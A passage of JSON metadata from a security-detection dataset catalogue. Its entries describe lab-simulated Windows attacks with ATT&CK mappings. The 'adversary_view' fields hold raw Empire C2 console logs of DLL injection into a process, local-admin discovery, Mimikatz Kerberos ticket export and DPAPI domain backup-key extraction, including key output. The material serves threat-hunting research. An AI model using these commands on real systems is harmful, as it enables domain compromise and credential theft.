out to: /tmp/launcher.dll\n\n(Empire: stager/windows/dll) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\\pgustavo        powershell         9076   5/0.0    2020-07-22 03:52:58  http            \n\n(Empire: agents) > interact 712ETU3B\n(Empire: 712ETU3B) >\n(Empire: 712ETU3B) > ps\n[*] Tasked 712ETU3B to run TASK_SHELL\n[*] Agent 712ETU3B tasked with task ID 1\n(Empire: 712ETU3B) > upload /tmp/launcher.dll\n[*] Tasked agent to upload launcher.dll, 155 KB\n[*] Tasked 712ETU3B to run TASK_UPLOAD\n[*] Agent 712ETU3B tasked with task ID 2\n(Empire: 712ETU3B) >\nProcessName                                                      PID Arch UserName                     MemUsage \n-----------                                                      --- ---- --------                     -------- \nIdle                                                               0 x64  N/A                          0.01 MB  \nSystem                                                             4 x64  N/A                          0.14 MB  \nRegistry                                                          88 x64  NT AUTHORITY\\SYSTEM          59.03 MB \nsvchost                                                          396 x64  NT AUTHORITY\\SYSTEM          8.43 MB  \nsmss                                                             408 x64  NT AUTHORITY\\SYSTEM          1.10 MB  \nLogonUI                                                          456 x64  NT AUTHORITY\\SYSTEM          47.74 MB \ncsrss                                                            524 x64  NT AUTHORITY\\SYSTEM          4.66 MB  \nwininit                                                          596 x64  NT AUTHORITY\\SYSTEM          6.04 MB  \ncsrss                                                            604 x64  NT AUTHORITY\\SYSTEM          3.95 MB  \nwinlogon                                                         664 x64  NT AUTHORITY\\SYSTEM          9.32 MB  \ncsrss                                                            716 x64  NT AUTHORITY\\SYSTEM          5.08 MB  \nservices                                                         732 x64  NT AUTHORITY\\SYSTEM          12.67 MB \nlsass                                                            740 x64  NT AUTHORITY\\SYSTEM          21.21 MB \ndwm                                                              796 x64  Window Manager\\DWM-1         36.96 MB \nctfmon                                                           808 x64  MORDOR\\pgustavo              13.93 MB \nsvchost                                                          856 x64  NT AUTHORITY\\SYSTEM          3.58 MB  \nfontdrvhost                                                      880 x64  Font Driver Host\\UMFD-1      2.18 MB  \nfontdrvhost                                                      884 x64  Font Driver Host\\UMFD-0      2.22 MB  \nsvchost                                                          920 x64  NT AUTHORITY\\SYSTEM          28.34 MB \nsvchost                                                          996 x64  NT AUTHORITY\\NETWORK SERVICE 14.50 MB \nsvchost                                                         1056 x64  NT AUTHORITY\\NETWORK SERVICE 67.65 MB \nsvchost                                                         1096 x64  NT AUTHORITY\\SYSTEM          6.86 MB  \nsvchost                                                         1120 x64  NT AUTHORITY\\SYSTEM          9.29 MB  \nsvchost                                                         1164 x64  NT AUTHORITY\\LOCAL SERVICE   6.02 MB  \nsvchost                                                         1176 x64  NT AUTHORITY\\LOCAL SERVICE   6.60 MB  \nsvchost                                                         1184 x64  NT AUTHORITY\\LOCAL SERVICE   11.45 MB \nsvchost                                                         1192 x64  NT AUTHORITY\\LOCAL SERVICE   5.42 MB  \nbrowser_broker                                                  1220 x64  MORDOR\\pgustavo              10.18 MB \nbackgroundTaskHost                                              1296 x64  MORDOR\\pgustavo              16.88 MB \nsvchost                                                         1304 x64  NT AUTHORITY\\SYSTEM          14.52 MB \nsvchost                                                         1356 x64  NT AUTHORITY\\LOCAL SERVICE   6.06 MB  \nsvchost                                                         1392 x64  NT AUTHORITY\\LOCAL SERVICE   27.38 MB \nsvchost                                                         1408 x64  NT AUTHORITY\\NETWORK SERVICE 7.54 MB  \nsvchost                                                         1436 x64  NT AUTHORITY\\SYSTEM          10.04 MB \nsvchost                                                         1444 x64  NT AUTHORITY\\SYSTEM          5.67 MB  \nSecurityHealthSystray                                           1468 x64  MORDOR\\pgustavo              11.66 MB \nsvchost                                                         1488 x64  NT AUTHORITY\\SYSTEM          5.47 MB  \nsvchost                                                         1496 x64  NT AUTHORITY\\SYSTEM          6.18 MB  \nsvchost                                                         1504 x64  NT AUTHORITY\\SYSTEM          6.77 MB  \nsvchost                                                         1532 x64  NT AUTHORITY\\LOCAL SERVICE   7.59 MB  \nsvchost                                                         1544 x64  NT AUTHORITY\\LOCAL SERVICE   5.32 MB  \nsvchost                                                         1740 x64  NT AUTHORITY\\NETWORK SERVICE 11.28 MB \nsvchost                                                         1764 x64  NT AUTHORITY\\LOCAL SERVICE   16.14 MB \nsvchost                                                         1868 x64  NT AUTHORITY\\LOCAL SERVICE   17.68 MB \nVSSVC                                                           1936 x64  NT AUTHORITY\\SYSTEM          7.02 MB  \nsvchost                                                         1960 x64  NT AUTHORITY\\SYSTEM          13.24 MB \nsvchost                                                         1968 x64  NT AUTHORITY\\LOCAL SERVICE   7.03 MB  \nsvchost                                                         1980 x64  NT AUTHORITY\\SYSTEM          47.10 MB \nsvchost                                                         1992 x64  NT AUTHORITY\\SYSTEM          5.35 MB  \nRuntimeBroker                                                   2068 x64  MORDOR\\pgustavo              21.71 MB \nMemory Compression                                              2104 x64  NT AUTHORITY\\SYSTEM          98.54 MB \nsvchost                                                         2188 x64  NT AUTHORITY\\SYSTEM          9.24 MB  \nbackgroundTaskHost                                              2196 x64  MORDOR\\pgustavo              38.76 MB \nsvchost                                                         2208 x64  NT AUTHORITY\\SYSTEM          7.00 MB  \nSgrmBroker                                                      2252 x64  NT AUTHORITY\\SYSTEM          5.88 MB  \nspoolsv                                                         2260 x64  NT AUTHORITY\\SYSTEM          14.19 MB \nsvchost                                                         2264 x64  NT AUTHORITY\\SYSTEM          9.81 MB  \nsvchost                                                         2296 x64  NT AUTHORITY\\SYSTEM          7.45 MB  \nsvchost                                                         2316 x64  NT AUTHORITY\\LOCAL SERVICE   7.14 MB  \nsvchost                                                         2372 x64  NT AUTHORITY\\SYSTEM          6.17 MB  \nsvchost                                                         2484 x64  NT AUTHORITY\\LOCAL SERVICE   6.16 MB  \nRuntimeBroker                                                   2540 x64  MORDOR\\pgustavo              28.75 MB \nsvchost                                                         2548 x64  NT AUTHORITY\\LOCAL SERVICE   6.89 MB  \nsmartscreen                                                     2568 x64  MORDOR\\pgustavo              27.85 MB \nsvchost                                                         2592 x64  NT AUTHORITY\\SYSTEM          19.99 MB \nsvchost                                                         2608 x64  NT AUTHORITY\\NETWORK SERVICE 8.35 MB  \nsvchost                                                         2644 x64  NT AUTHORITY\\SYSTEM          10.73 MB \nsvchost                                                         2676 x64  NT AUTHORITY\\LOCAL SERVICE   13.55 MB \nWaSecAgentProv                                                  2760 x64  NT AUTHORITY\\SYSTEM          5.63 MB  \nsvchost                                                         2776 x64  NT AUTHORITY\\SYSTEM          9.90 MB  \nsvchost                                                         2812 x64  NT AUTHORITY\\LOCAL SERVICE   5.57 MB  \nsvchost                                                         2820 x64  NT AUTHORITY\\SYSTEM          11.99 MB \nsvchost                                                         2828 x64  NT AUTHORITY\\LOCAL SERVICE   8.51 MB  \nsvchost                                                         2920 x64  NT AUTHORITY\\SYSTEM          11.50 MB \nsihost                                                          3104 x64  MORDOR\\pgustavo              27.69 MB \nsvchost                                                         3256 x64  NT AUTHORITY\\NETWORK SERVICE 12.81 MB \nsvchost                                                         3268 x64  NT AUTHORITY\\SYSTEM          24.27 MB \nsvchost                                                         3284 x64  NT AUTHORITY\\LOCAL SERVICE   33.89 MB \nsvchost                                                         3344 x64  NT AUTHORITY\\SYSTEM          5.10 MB  \nsvchost                                                         3372 x64  NT AUTHORITY\\LOCAL SERVICE   6.68 MB  \nShellExperienceHost                                             3384 x64  MORDOR\\pgustavo              50.26 MB \nsvchost                                                         3440 x64  NT AUTHORITY\\SYSTEM          15.84 MB \nWindowsAzureGuestAgent                                          3468 x64  NT AUTHORITY\\SYSTEM          59.33 MB \nWaAppAgent                                                      3476 x64  NT AUTHORITY\\SYSTEM          73.09 MB \nWindowsAzureNetAgent                                            3544 x64  NT AUTHORITY\\SYSTEM          7.45 MB  \nsvchost                                                         3564 x64  NT AUTHORITY\\LOCAL SERVICE   4.78 MB  \nNetworkWatcherAgent                                             3580 x64  NT AUTHORITY\\SYSTEM          12.99 MB \nsvchost                                                         3624 x64  NT AUTHORITY\\SYSTEM          8.15 MB  \nsvchost                                                         3648 x64  NT AUTHORITY\\SYSTEM          12.23 MB \nsvchost                                                         4240 x64  NT AUTHORITY\\SYSTEM          19.69 MB \nWUDFHost                                                        4276 x64  NT AUTHORITY\\LOCAL SERVICE   29.04 MB \nSearchIndexer                                                   4296 x64  NT AUTHORITY\\SYSTEM          33.70 MB \nconhost                                                         4304 x64  MORDOR\\pgustavo              15.58 MB \ntaskhostw                                                       4432 x64  NT AUTHORITY\\SYSTEM          36.85 MB \nsvchost                                                         4440 x64  NT AUTHORITY\\SYSTEM          9.48 MB  \nsvchost                                                         4616 x64  MORDOR\\pgustavo              16.36 MB \nsvchost                                                         4628 x64  NT AUTHORITY\\SYSTEM          8.93 MB  \nsvchost                                                         4640 x64  NT AUTHORITY\\SYSTEM          19.45 MB \nsvchost                                                         4796 x64  NT AUTHORITY\\LOCAL SERVICE   9.97 MB  \nconhost                                                         4856 x64  MORDOR\\pgustavo              15.93 MB \nsvchost                                                         4900 x64  NT AUTHORITY\\SYSTEM          7.45 MB  \nStartMenuExperienceHost                                         5024 x64  MORDOR\\pgustavo              61.98 MB \nsvchost                                                         5064 x64  NT AUTHORITY\\LOCAL SERVICE   9.70 MB  \nsvchost                                                         5080 x64  NT AUTHORITY\\SYSTEM          7.20 MB  \nsvchost                                                         5148 x64  NT AUTHORITY\\NETWORK SERVICE 18.23 MB \nsvchost                                                         5464 x64  MORDOR\\pgustavo              21.27 MB \nMicrosoftEdge                                                   5516 x64  MORDOR\\pgustavo              65.12 MB \nsvchost                                                         5524 x64  NT AUTHORITY\\LOCAL SERVICE   6.69 MB  \nsvchost                                                         5548 x64  NT AUTHORITY\\SYSTEM          18.43 MB \nRuntimeBroker                                                   5596 x64  MORDOR\\pgustavo              48.75 MB \nsvchost                                                         5640 x64  NT AUTHORITY\\SYSTEM          6.71 MB  \nsvchost                                                         5648 x64  NT AUTHORITY\\SYSTEM          8.14 MB  \nsvchost                                                         5704 x64  NT AUTHORITY\\SYSTEM          5.90 MB  \nsvchost                                                         5812 x64  NT AUTHORITY\\LOCAL SERVICE   6.93 MB  \ndllhost                                                         5976 x64  MORDOR\\pgustavo              15.26 MB \nsvchost                                                         6008 x64  NT AUTHORITY\\LOCAL SERVICE   8.91 MB  \nsvchost                                                         6036 x64  NT AUTHORITY\\LOCAL SERVICE   6.32 MB  \nsvchost                                                         6072 x64  MORDOR\\pgustavo              33.20 MB \nRuntimeBroker                                                   6152 x64  MORDOR\\pgustavo              24.96 MB \nTrustedInstaller                                                6280 x64  NT AUTHORITY\\SYSTEM          6.59 MB  \nsvchost                                                         6368 x64  NT AUTHORITY\\SYSTEM          9.77 MB  \nsvchost                                                         6488 x64  NT AUTHORITY\\SYSTEM          11.64 MB \nnotepad                                                         6536 x64  MORDOR\\pgustavo              15.43 MB \nSecurityHealthHost                                              6540 x64  MORDOR\\pgustavo              15.52 MB \nfontdrvhost                                                     6652 x64  Font Driver Host\\UMFD-3      6.01 MB  \nWindowsInternal.ComposableShell.Experiences.TextInput.InputApp  6680 x64  MORDOR\\pgustavo              34.32 MB \nMicrosoftEdgeCP                                                 6744 x64  MORDOR\\pgustavo              51.89 MB \nWmiPrvSE                                                        6904 x64  NT AUTHORITY\\NETWORK SERVICE 10.39 MB \nMicrosoft.Photos                                                7044 x64  MORDOR\\pgustavo              34.66 MB \ndllhost                                                         7084 x64  MORDOR\\pgustavo              7.86 MB  \nconhost                                                         7136 x64  NT AUTHORITY\\SYSTEM          5.40 MB  \ndwm                                                             7348 x64  Window Manager\\DWM-3         83.22 MB \nRuntimeBroker                                                   7468 x64  MORDOR\\pgustavo              24.92 MB \nWindows.WARP.JITService                                         7620 x64  NT AUTHORITY\\LOCAL SERVICE   5.05 MB  \nwinlogon                                                        8012 x64  NT AUTHORITY\\SYSTEM          8.22 MB  \nMsMpEng                                                         8272 x64  NT AUTHORITY\\SYSTEM          102.83 MB\nsvchost                                                         8328 x64  NT AUTHORITY\\LOCAL SERVICE   8.31 MB  \nRuntimeBroker                                                   8392 x64  MORDOR\\pgustavo              20.96 MB \nsvchost                                                         8408 x64  MORDOR\\pgustavo              30.12 MB \nWindows.WARP.JITService                                         8416 x64  NT AUTHORITY\\LOCAL SERVICE   5.21 MB  \nsvchost                                                         8480 x64  NT AUTHORITY\\SYSTEM          5.68 MB  \nApplicationFrameHost                                            8484 x64  MORDOR\\pgustavo              28.34 MB \nexplorer                                                        8532 x64  MORDOR\\pgustavo              117.59 MB\nWUDFHost                                                        8600 x64  NT AUTHORITY\\LOCAL SERVICE   4.83 MB  \npowershell                                                      8648 x64  MORDOR\\pgustavo              73.75 MB \nMicrosoftEdgeSH                                                 8880 x64  MORDOR\\pgustavo              15.34 MB \npowershell                                                      9076 x64  MORDOR\\pgustavo              121.03 MB\nrdpclip                                                         9128 x64  MORDOR\\pgustavo              10.55 MB \ntaskhostw                                                       9236 x64  MORDOR\\pgustavo              16.99 MB \nSearchUI                                                        9328 x64  MORDOR\\pgustavo              211.37 MB\nSysmon                                                          9368 x64  NT AUTHORITY\\SYSTEM          17.81 MB \nsvchost                                                         9560 x64  NT AUTHORITY\\SYSTEM          10.84 MB \nSecurityHealthService                                           9640 x64  NT AUTHORITY\\SYSTEM          16.16 MB \nRuntimeBroker                                                   9768 x64  MORDOR\\pgustavo              30.12 MB \nsvchost                                                         9860 x64  NT AUTHORITY\\SYSTEM          5.57 MB  \nunsecapp                                                        9996 x64  NT AUTHORITY\\SYSTEM          6.41 MB  \nTiWorker                                                       10084 x64  NT AUTHORITY\\SYSTEM          27.34 MB \nsvchost                                                        10164 x64  NT AUTHORITY\\SYSTEM          10.19 MB\n\n(Empire: 712ETU3B) > usemodule code_execution/invoke_dllinjection\n(Empire: powershell/code_execution/invoke_dllinjection) > set Dll launcher.dll \n(Empire: powershell/code_execution/invoke_dllinjection) > set ProcessID 6536\n(Empire: powershell/code_execution/invoke_dllinjection) > info\n\n              Name: Invoke-DllInjection\n            Module: powershell/code_execution/invoke_dllinjection\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n\nDescription:\n  Uses PowerSploit's Invoke-DLLInjection to inject  a Dll into\n  the process ID of your choosing.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Co\n  deExecution/Invoke-DllInjection.ps1\n\nOptions:\n\n  Name      Required    Value                     Description\n  ----      --------    -------                   -----------\n  Agent     True        712ETU3B                  Agent to run module on.                 \n  ProcessID True        6536                      Process ID of the process you want to   \n                                                  inject a Dll into.                      \n  Dll       True        launcher.dll              Name of the dll to inject. This can be  \n                                                  an absolute or relative path.           \n\n(Empire: powershell/code_execution/invoke_dllinjection) > execute\n[*] Tasked 712ETU3B to run TASK_CMD_WAIT\n[*] Agent 712ETU3B tasked with task ID 6\n[*] Tasked agent 712ETU3B to run module powershell/code_execution/invoke_dllinjection\n(Empire: powershell/code_execution/invoke_dllinjection) > \nSystem.Diagnostics.ProcessModule (launcher.dll)\n\n(Empire: powershell/code_execution/invoke_dllinjection) >"
+        },
+        "references": [
+            "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:33.048296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518224039.yaml": {
+        "title": "Empire Find Local Admin Access",
+        "id": "SDWIN-190518224039",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2019/05/18",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC OpenSCManager",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents adversaries using the OpenSCManagerW Win32API call to establish a handle to the remote host and verify if the current user context has local administrator acess to the target.",
+        "attack_mappings": [
+            {
+                "technique": "T1069",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_find_localadmin_smb_svcctl_OpenSCManager.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "find_localadmin_access",
+                    "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: GCSKD17Z) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nGCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         1112   5/0.0    2020-09-22 06:15:19  http            \n\n(Empire: agents) > interact GCSKD17Z\n(Empire: GCSKD17Z) > usemodule situational_awareness/network/powerview/find_localadmin_access\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute\n[*] Tasked GCSKD17Z to run TASK_CMD_JOB\n[*] Agent GCSKD17Z tasked with task ID 8\n[*] Tasked agent GCSKD17Z to run module powershell/situational_awareness/network/powerview/find_localadmin_access\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > \nJob started: GL5DUX\n\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > back\n(Empire: GCSKD17Z) > \nWORKSTATION5.theshire.local\nWORKSTATION6.theshire.local\nMORDORDC.theshire.local\nWEC.theshire.local\n\nFind-LocalAdminAccess completed!\n\n(Empire: GCSKD17Z) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:33.250296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518230752.yaml": {
+        "title": "Empire Mimikatz Extract Kerberos Keys",
+        "id": "SDWIN-190518230752",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2019/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Kerberos Tickets"
+        ],
+        "description": "This dataset represents adversaries extracting kerberos tickets from memory.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_extract_keys.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "extract_tickets",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 07:35:29  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets\n(Empire: powershell/credentials/mimikatz/extract_tickets) > info\n\n              Name: Invoke-Mimikatz extract kerberos tickets.\n            Module: powershell/credentials/mimikatz/extract_tickets\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract\n  kerberos tickets from memory in base64-encoded form.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        WE8XYD3K                  Agent to run module on.                 \n\n(Empire: powershell/credentials/mimikatz/extract_tickets) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 1\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets\n(Empire: powershell/credentials/mimikatz/extract_tickets) > \nJob started: PY68ZG\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # standard::base64\nisBase64InterceptInput  is false\nisBase64InterceptOutput is false\n\nmimikatz(powershell) # kerberos::list /export\n\n[00000000] - 0x00000012 - aes256_hmac      \n  Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM\n  Server Name       : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL\n  Client Name       : pgustavo @ THESHIRE.LOCAL\n  Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; \n  * Saved to file     : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi\n\n(Empire: powershell/credentials/mimikatz/extract_tickets) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:33.452298+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518235535.yaml": {
+        "title": "Empire Mimikatz Backup Keys",
+        "id": "SDWIN-190518235535",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "DPAPI",
+            "DPAPI Domain Backup key",
+            "RPC LSARPC"
+        ],
+        "description": "This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Domain DPAPI Backup Key Extraction",
+                "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "mimikatz_lsadump_backupkeys",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Domain Admin"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nALYH6ZB2 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4380   5/0.0    2020-10-22 18:24:28  http            \n\n(Empire: agents) > interact ALYH6ZB2\n(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/\ncache*           command          dcsync_hashdump  golden_ticket    logonpasswords*  mimitokens*      purge            silver_ticket    \ncerts*           dcsync           extract_tickets  keys*            lsadump*         pth*             sam*             trust_keys*      \n(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command\n(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export\n(Empire: powershell/credentials/mimikatz/command) > execute\n[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB\n[*] Agent ALYH6ZB2 tasked with task ID 1\n[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command\n(Empire: powershell/credentials/mimikatz/command) > \nJob started: 75WB4S\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Oct  4 2020 10:28:51\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > https://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/\n\nmimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export\n\nCurrent prefered key:       {a0feda20-878f-4e68-ba74-d4df8f0191ab}\n  * RSA key\n        |Provider name : Microsoft Strong Cryptographic Provider\n        |Unique name   : \n        |Implementation: CRYPT_IMPL_SOFTWARE ; \n        Algorithm      : CALG_RSA_KEYX\n        Key size       : 2048 (0x00000800)\n        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )\n        Exportable key : YES\n        Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'\n        PFX container  : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'\n        Export         : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'\n\nCompatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}\n  * Legacy key\ndaef8bf857ba653c7c233a1156d0fb3c488487caf7b0cb1879f6f6fd4dc3877d\n4ad77077efd018b07267585828f1e3a7e88abd203ca86d820bcd1f1f806426e2\n71834ddd67073b1e581379be55a6dd97fecee5ff9cda881936209f35653a681e\n444aedb87d2bef790e4b25084c4395372f358e226893731f621eb3f0f99153ab\n9af4c25dd32010ffe1bcac8b7ba10c6163d97b85ee19653356624068b8f01476\n77cb393bbf0fd4369a8a6982545aa2a81b70132b636218bdb9a7b7f7149d361c\n45236e528672ec9defd57430cdc0264ad6d51669715d83be2b059ec162607603\n834960f44601d4a2a02d901d67f7046b81adf702b48f8420598dd8e81fe8b1bc\n\n        Export         : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'\n(Empire: powershell/credentials/mimikatz/command) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:33.636296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190519005224.yaml": {
+        "title": "Empire Remote Get Session",
+        "id": "SDWIN-190519005224",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/19",
+        "modification_date": "2019/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC NetSessEnum",
+            "SMB Srvsvc"
+        ],
+        "description": "This dataset represents adversaries leveraging RPC SRVSVC and the method NetSessEnum over SMB to query remote hosts for active sessions",
+        "attack_mappings": [
+            {
+                "technique": "T1049",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_getsession_dcerpc_smb_srvsvc_NetSessEnum.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_getsession_dcerpc_smb_srvsvc_NetSessEnum.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "get_session",
+                    "script": "https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/situational_awareness/network/powerview.ps1"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
